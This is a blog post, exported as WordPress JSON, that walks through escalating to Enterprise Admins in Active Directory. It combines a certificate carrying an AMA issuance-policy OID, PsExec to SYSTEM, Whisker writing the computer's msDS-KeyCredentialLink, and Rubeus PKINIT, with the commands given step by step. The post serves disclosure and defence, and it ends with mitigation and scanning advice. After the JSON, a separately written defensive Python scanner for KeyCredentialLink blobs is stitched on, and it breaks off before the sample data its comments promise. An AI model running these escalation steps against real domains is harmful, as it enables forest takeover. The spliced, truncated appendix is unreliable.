{"id":1215,"date":"2025-02-24T21:51:11","date_gmt":"2025-02-24T20:51:11","guid":{"rendered":"https:\/\/blog.chrisse.se\/?p=1215"},"modified":"2025-02-24T23:03:58","modified_gmt":"2025-02-24T22:03:58","slug":"when-your-enterprise-pki-becomes-one-of-your-enemies-part-4","status":"publish","type":"post","link":"https:\/\/blog.chrisse.se\/?p=1215","title":{"rendered":"When your Enterprise PKI becomes one of your enemies (Part 4)"},"content":{"rendered":"\n<p>In the previous post in this series &#8211; <a href=\"https:\/\/blog.chrisse.se\/?p=1187\" data-type=\"link\" data-id=\"https:\/\/blog.chrisse.se\/?p=1187\">When your Enterprise PKI becomes one of your enemies (Part 3)<\/a> &#8211; we went through how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if the PKI is not designed the right way.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"584\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7.png\" alt=\"\" class=\"wp-image-1216\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7-300x171.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-7-768x438.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>To summarize the abuse demonstrated in that post, here are the requirements (note that the issuing CA does not have to be trusted in NTAuth):<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li class=\"indent40\">Obtain a certificate from a certificate authority (CA) that is trusted by the KDC and be able to supply the AMA Issuance Policy OID in it &#8211; this can be achieved through:\n<ul class=\"wp-block-list\">\n<li>A certificate template configured for &#8216;Supply in the request&#8217; 
&#8211; SITR<\/li>\n\n\n\n<li>Being delegated Certificate Manager on the certificate authority for one or more templates<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li class=\"indent40\">The KDC must have a valid certificate<\/li>\n\n\n\n<li class=\"indent40\">Being able to write to at least one user account&#8217;s altSecId (altSecurityIdentities) attribute.<\/li>\n<\/ol>\n\n\n\n<p><strong>Authentication Mechanism Assurance (AMA) abuse using Key Trust and KCL<\/strong><\/p>\n\n\n\n<p>Let&#8217;s demonstrate another way to abuse Authentication Mechanism Assurance (AMA) that changes the requirements a bit &#8211; this is only possible against Windows Server 2016 KDCs and later.<\/p>\n\n\n\n<p>Windows Server 2016 introduced the Key Trust model to the KDC, where PKINIT can be performed using an explicit key trust instead of certificate trust. The key trust model works by mapping the public key of a private\/public key pair into the &#8216;msDS-KeyCredentialLink&#8217; attribute of a security principal derived from the user or computer class; authentication is then performed by proving possession of the corresponding private key during PKINIT, with the KDC matching the public key in the request against the stored value. 
This functionality was mainly added to support Windows Hello for Business (WHFB), allowing other authentication methods to be used on top of PKINIT; it is also utilized by Entra ID Kerberos Cloud Trust.<\/p>\n\n\n\n<p>For more information see &#8211; <a href=\"https:\/\/learn.microsoft.com\/en-us\/openspecs\/windows_protocols\/ms-pkca\/43cc84aa-4575-4452-bfd5-9758994b8f6f\">3.1.5.2.1.4 Key Trust<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"560\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1024x560.png\" alt=\"\" class=\"wp-image-1218\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1024x560.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-300x164.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-768x420.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8-1536x840.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/image-8.png 1626w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>So what does the Key Trust model have to do with Authentication Mechanism Assurance (AMA)? 
<\/p>\n\n\n\n<p>We can think of &#8216;msDS-KeyCredentialLink&#8217; as playing the role of the &#8216;altSecurityIdentities&#8217; attribute in the previous abuse scenario. There is one major difference, though: a computer account can by default write to its own &#8216;msDS-KeyCredentialLink&#8217; attribute, because the default ACL of every computer account grants that right to the SELF security principal &#8211; as long as &#8216;msDS-KeyCredentialLink&#8217; is still empty.<\/p>\n\n\n\n<p>This is interesting as it means there is no need to have any special access in the directory to upload the public key of our private\/public key pair, as long as we can become \/ operate in the security context of just one domain joined computer account within the entire forest. Doing so only requires being local administrator on one of those boxes and utilizing PsExec to become SYSTEM.<\/p>\n\n\n\n<p>Note that all my demos use \u2018<a href=\"https:\/\/github.com\/CarlSorqvist\/PsCertTools\/tree\/main\/CertReqTools\">CertRequestTools<\/a>\u2018 from Carl S\u00f6rqvist and in this case also <a href=\"https:\/\/github.com\/GhostPack\/Rubeus\">Rubeus<\/a> from Will Schroeder and <a href=\"https:\/\/github.com\/eladshamir\/Whisker\/\">Whisker<\/a> from Elad Shamir.<\/p>\n\n\n\n<p>But first we need to obtain a certificate carrying the AMA Issuance Policy OID and enroll it into the machine store. Replace &lt;Template&gt; with a template in your environment that is configured for Supply in the request (SITR):<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 
16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">AMA-KCL.ps1<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n# Chrisse Issuing CA1 is trusted in NTAUTH\n$CA1 = &quot;nttest-ca-01.nttest.chrisse.com\\Chrisse Issuing CA 1&quot;  \n# A0 AMA Policy OID (linked to Enterprise Admins)\n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n \nNew-PrivateKey -RsaKeySize 2048 -KeyName ([Guid]::NewGuid()) `\n| New-CertificateRequest `\n    -Subject &quot;CN=DEMO4&quot; `\n    -UserPrincipalName &quot;NTTEST-CL-01.nttest.chrisse.com&quot; `\n    -OtherExtension $AmaExtension `\n| Submit-CertificateRequest `\n    -ConfigString $CA1 `\n    -Template &lt;Template&gt; `\n| Install-Certificate -Name My -Location LocalMachine\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Chrisse 
Issuing CA1 is trusted in NTAUTH<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CA1 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;nttest-ca-01.nttest.chrisse.com\\Chrisse Issuing CA 1&quot;<\/span><span style=\"color: #24292EFF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># A0 AMA Policy OID (linked to Enterprise Admins)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-PrivateKey<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">RsaKeySize <\/span><span style=\"color: #1976D2\">2048<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyName ([<\/span><span style=\"color: #D32F2F\">Guid<\/span><span style=\"color: #24292EFF\">]::NewGuid()) <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificateRequest<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Subject <\/span><span style=\"color: 
#22863A\">&quot;CN=DEMO4&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">UserPrincipalName <\/span><span style=\"color: #22863A\">&quot;NTTEST-CL-01.nttest.chrisse.com&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">OtherExtension $AmaExtension <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">Submit-CertificateRequest<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">ConfigString $CA1 <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Template <\/span><span style=\"color: #D32F2F\">&lt;<\/span><span style=\"color: #24292EFF\">Template<\/span><span style=\"color: #D32F2F\">&gt;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">Install-Certificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name My <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Location LocalMachine<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now 
it&#8217;s time to become the machine itself and act as SYSTEM on &#8220;NTTEST-CL-01.nttest.chrisse.com&#8221;<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Psexec.exe -i -s C:\\WINDOWS\\system32\\cmd.exe\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">Psexec.exe -i -s C:\\WINDOWS\\system32\\cmd.exe<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Now we&#8217;re going to add the public key of our certificate to the &#8216;msDS-KeyCredentialLink&#8217; attribute of the computer account &#8211; to do this we use Whisker.<\/p>\n\n\n\n<p>Replace &lt;Hash&gt; with the thumbprint (SHA-1 hash) of the certificate issued previously and launch it in the cmd instance created by PsExec.<\/p>\n\n\n\n<div 
class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"whisker add \/target:NTTEST-CL-01$ \/path:&lt;HASH&gt;\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">whisker add \/target:NTTEST-CL-01$ \/path:&lt;HASH&gt;<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Note that I&#8217;ve modified Whisker slightly to look for a certificate by hash in the computer personal store, also known as LocalMachine\\MY.<\/p>\n\n\n\n<p>From here the path is very similar to the previous abuse scenario: we use Rubeus to perform PKINIT with our certificate, and the KDC matches the certificate&#8217;s public key against the key we just stored in &#8216;msDS-KeyCredentialLink&#8217; of the computer account 
&#8220;NTTEST-CL-01.nttest.chrisse.com&#8221;.<\/p>\n\n\n\n<p>Note that I&#8217;ve modified Rubeus slightly to also look for certificates by hash in the computer personal store, also known as LocalMachine\\MY.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"rubeus asktgt \/user:NTTEST-CL-01$ \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">rubeus asktgt \/user:NTTEST-CL-01$ \/certificate:&lt;HASH&gt; \/enctype:aes256 \/createnetonly:C:\\Windows\\System32\\cmd.exe \/show<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>We should now be authenticated as the computer account 
&#8220;NTTEST-CL-01.nttest.chrisse.com&#8221; and have two extra security groups &#8211; \u2018Enterprise Admins (AMA)\u2019 and \u2018Enterprise Admins\u2019 (RID 519) &#8211; as part of our token, thanks to the AMA Issuance Policy being present in the certificate we authenticated with.<\/p>\n\n\n\n<p>You should now see something similar to the screen below: the cmd launched by Rubeus has \u2018Enterprise Admins\u2019 privileges and you should be able to add a user to \u2018Domain Admins\u2019, as shown in the screenshot.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"470\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1024x470.png\" alt=\"\" class=\"wp-image-1223\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1024x470.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-300x138.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-768x353.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3-1536x705.png 1536w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/02\/3.png 1664w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p><strong>Summary<\/strong><\/p>\n\n\n\n<p>Compared to the example demonstrated in the previous blog post, this path to abusing Authentication Mechanism Assurance (AMA) differs in two main ways.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li class=\"indent40\">It requires the ability to become local administrator on any single computer within the Active Directory forest, instead of write access in Active Directory to a user&#8217;s &#8216;altSecurityIdentities&#8217; attribute.<\/li>\n\n\n\n<li class=\"indent40\">For this to work, the certificate authority that issues the certificate must be trusted in NTAuth.<\/li>\n<\/ol>\n\n\n\n<p>The requirement 
of being able to supply the AMA Issuance Policy OID in the certificate still remains and can be achieved the same way:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li class=\"indent40\">Templates published on the Certificate Authority that are configured for Supply in the request &#8211; SITR.<\/li>\n\n\n\n<li class=\"indent40\">Being Certificate Manager on the CA over one or more templates<\/li>\n<\/ul>\n\n\n\n<p>One side effect of dealing with a key trust here instead of a certificate trust is that the KDC skips the usual certificate validation, so errors such as a revoked certificate (CRL) are ignored. That means that once a certificate issued for AMA abuse has had its public key stored in any computer account&#8217;s &#8216;msDS-KeyCredentialLink&#8217; in the forest, revoking that certificate will NOT help. Pretty bad, isn&#8217;t it? In order to scan your forest you must obtain the public key of every certificate issued with the AMA Issuance Policy OID from all your Certificate Authorities and compare them against every single object that has contents in &#8216;msDS-KeyCredentialLink&#8217;, which is a linked multi-valued attribute.<\/p>\n\n\n\n<p>Authentication Mechanism Assurance (AMA) is a good feature if deployed correctly, for the reasons mentioned earlier in this series: binding strong privileges to certificate based authentication, just in time, is a good thing for sure. The question remains what we can do to prevent the abuse of Authentication Mechanism Assurance (AMA) as described and demonstrated in this blog post. 
It is possible if you design your Public Key Infrastructure, and how it integrates with Active Directory, the right way; we are going to cover some alternatives for how this can be mitigated in coming blog posts.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In the previous post in this series &#8211; When your Enterprise PKI becomes one of your enemies (Part 3) &#8211; we went through how Authentication Mechanism Assurance (AMA) works and how it can be abused together with Public Key Infrastructure (PKI) to compromise an Active Directory forest if the PKI is not designed the right way. To summarize the &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/blog.chrisse.se\/?p=1215\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;When your Enterprise PKI becomes one of your enemies (Part 4)&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"footnotes":""},"categories":[36],"tags":[6,32,30,31],"class_list":["post-1215","post","type-post","status-publish","format-standard","hentry","category-public-key-infrastructure-pki","tag-active-directory","tag-adcs","tag-pki","tag-sitr"],"_links":{"self":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1215","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1215"}],"version-history":[{"count":10,"href":"https:\/\/blog.chriss
e.se\/index.php?rest_route=\/wp\/v2\/posts\/1215\/revisions"}],"predecessor-version":[{"id":1232,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=\/wp\/v2\/posts\/1215\/revisions\/1232"}],"wp:attachment":[{"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.chrisse.se\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
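The scan the post's summary calls for (collect the public key of every certificate your CAs issued with the AMA issuance-policy OID, then check every object whose msDS-KeyCredentialLink is populated) needs a decoder for the KEYCREDENTIALLINK_BLOB that Whisker-style tools write into that attribute. The following is an added example, not code from the post or from Whisker, Rubeus or CertRequestTools: it splits the DN-Binary value, walks the TLV entries per MS-ADTS 2.2.20, verifies the KeyID and KeyHash entries, pulls the RSA modulus and exponent out of the BCRYPT_RSAKEY_BLOB key material, and matches them against a set of known keys. The sample DN, modulus and value at the bottom are constructed for the example (the modulus is not a real RSA key); in practice the attribute values come from an LDAP query for (msDS-KeyCredentialLink=*) and the known keys from the issued-certificate rows in the CA database.

```python
# Added example (not from the original post, Whisker or Rubeus): decode
# msDS-KeyCredentialLink values and flag entries whose RSA public key matches a
# key you already know, e.g. the public key of every certificate issued with the
# AMA issuance-policy OID. Layout per MS-ADTS 2.2.20 (KEYCREDENTIALLINK_BLOB)
# and the BCRYPT_RSAKEY_BLOB public-key layout. Sample data is constructed.
import hashlib
import struct
import uuid
from dataclasses import dataclass

KCL_VERSION = 0x200
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE, DEVICE_ID, KEY_CREATION = 1, 2, 3, 4, 5, 6, 9


@dataclass
class KeyCredential:
    owner_dn: str        # DN part of the DN-Binary value: the object holding the key
    modulus: int
    exponent: int
    key_usage: int       # 0x01 = NGC, the usage Windows Hello style keys carry
    device_id: uuid.UUID
    key_id_ok: bool      # KeyID == SHA256(KeyMaterial)
    key_hash_ok: bool    # KeyHash == SHA256(every entry after the KeyHash entry)


def split_dn_binary(value: str):
    """'B:<hex-char-count>:<hex>:<DN>' -> (raw blob, DN)."""
    tag, count, hexdata, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hexdata):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hexdata), dn


def parse_rsa_public_blob(blob: bytes):
    """BCRYPT_RSAKEY_BLOB: 'RSA1', BitLength, cbPublicExp, cbModulus, cbPrime1,
    cbPrime2 (all LE ULONG), followed by big-endian public exponent and modulus."""
    magic, bit_len, cb_exp, cb_mod = struct.unpack_from("<4sIII", blob, 0)
    if magic != b"RSA1":
        raise ValueError("KeyMaterial is not an RSA public key blob")
    off = 24                                  # six ULONGs of header
    exponent = int.from_bytes(blob[off:off + cb_exp], "big")
    modulus = int.from_bytes(blob[off + cb_exp:off + cb_exp + cb_mod], "big")
    if modulus.bit_length() != bit_len:
        raise ValueError("BitLength does not match the modulus")
    return modulus, exponent


def parse_key_credential(value: str) -> KeyCredential:
    blob, dn = split_dn_binary(value)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != KCL_VERSION:
        raise ValueError(f"unsupported KEYCREDENTIALLINK_BLOB version {version:#x}")
    entries, off, after_hash = {}, 4, None
    while off < len(blob):                    # entry = Length(2) Identifier(1) Value
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries[ident] = blob[off:off + length]
        off += length
        if ident == KEY_HASH:
            after_hash = off                  # KeyHash covers all bytes after itself
    material = entries[KEY_MATERIAL]
    modulus, exponent = parse_rsa_public_blob(material)
    return KeyCredential(
        owner_dn=dn, modulus=modulus, exponent=exponent,
        key_usage=entries.get(KEY_USAGE, b"\x00")[0],
        device_id=uuid.UUID(bytes_le=entries[DEVICE_ID]),
        key_id_ok=entries.get(KEY_ID) == hashlib.sha256(material).digest(),
        key_hash_ok=after_hash is not None
        and entries[KEY_HASH] == hashlib.sha256(blob[after_hash:]).digest(),
    )


def find_matching_keys(kcl_values, known_keys):
    """known_keys: {(modulus, exponent): label}. Returns [(owner DN, label)]."""
    hits = []
    for value in kcl_values:
        kc = parse_key_credential(value)
        label = known_keys.get((kc.modulus, kc.exponent))
        if label is not None:
            hits.append((kc.owner_dn, label))
    return hits


def build_key_credential(modulus: int, exponent: int, device_id: uuid.UUID, dn: str) -> str:
    """Encode a minimal, self-consistent value so the parser can be exercised offline."""
    def entry(ident: int, val: bytes) -> bytes:
        return struct.pack("<HB", len(val), ident) + val
    exp_b = exponent.to_bytes((exponent.bit_length() + 7) // 8, "big")
    mod_b = modulus.to_bytes((modulus.bit_length() + 7) // 8, "big")
    material = struct.pack("<4sIIIII", b"RSA1", modulus.bit_length(),
                           len(exp_b), len(mod_b), 0, 0) + exp_b + mod_b
    tail = (entry(KEY_MATERIAL, material) + entry(KEY_USAGE, b"\x01")
            + entry(KEY_SOURCE, b"\x00") + entry(DEVICE_ID, device_id.bytes_le)
            + entry(KEY_CREATION, struct.pack("<Q", 0)))
    blob = (struct.pack("<I", KCL_VERSION)
            + entry(KEY_ID, hashlib.sha256(material).digest())
            + entry(KEY_HASH, hashlib.sha256(tail).digest()) + tail)
    return f"B:{len(blob) * 2}:{blob.hex().upper()}:{dn}"


# Constructed sample data: the modulus is NOT a real RSA key, it only stands in
# for the public key of the AMA-issued certificate; the DN is made up as well.
SAMPLE_MODULUS = (1 << 2047) | 0x5EED
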